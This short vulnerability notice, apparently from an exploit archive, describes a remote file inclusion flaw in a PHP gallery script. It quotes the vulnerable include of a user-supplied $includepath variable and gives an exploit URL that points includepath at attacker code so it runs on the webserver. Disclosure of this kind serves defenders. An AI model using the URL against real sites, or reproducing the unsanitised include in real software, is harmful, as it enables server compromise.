Method:An attacker can exploit this issue to include
an arbitrary remote file containing malicious PHP code and execute
it in the context of the webserver process by
source:
if(isset($includepath)){
include ("$includepath");
http://[url]/gallerypath/index.php?includepath=evilcode
Greets:Rootshell Security Group